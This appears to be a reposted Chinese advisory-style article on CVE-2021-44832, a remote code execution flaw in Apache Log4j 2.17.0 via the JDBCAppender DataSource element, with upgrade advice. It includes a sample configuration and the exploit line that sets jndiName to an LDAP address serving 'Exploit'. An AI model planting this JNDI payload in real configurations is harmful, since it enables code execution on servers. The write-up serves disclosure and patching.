深潜之眼 10月24日 00:47
Apache Log4j 2.17.0 漏洞详解及修复建议
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

本文详细解析了CVE-2021-44832漏洞,分析了漏洞利用方式和修复建议。

kalpa(楚门) 2021-12-29 11:02

CVE-2021-44832 – APACHE LOG4J 2.17.0 通过 JDBCAPPENDER 数据源元素RCE

0x01 前言


    2021 年 12 月 28 日,有安全人员发布了关于 CVE-2021-44832 – APACHE LOG4J 2.17.0 的信息。


0x02 漏洞利用

    <?xml version="1.0" encoding="UTF-8"?><Configuration status="error">  <Appenders>  <JDBC name="databaseAppender" tableName="dbo.application_log">         <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />     <Column ...  </JDBC> </Appenders></Configuration>

    把 DataSource 标签的内容更改为:

      <DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>

      即可触发payload。


      图解:


      验证视频:



      0x03 修复建议

          将 Apache Log4j2 升级到 2.17.1、2.12.4 和 2.3.2 或更高版本。

        此漏洞利用门槛较高,得先拥有远程访问服务器和更改配置的权限;目前来看,其可作为权限维持的选项之一。


        原文链接:https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

        阅读原文

        跳转微信打开

        Fish AI Reader

        Fish AI Reader

        AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

        FishAI

        FishAI

        鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

        联系邮箱 441953276@qq.com

        相关标签

        Apache Log4j CVE-2021-44832 RCE 修复建议
        相关文章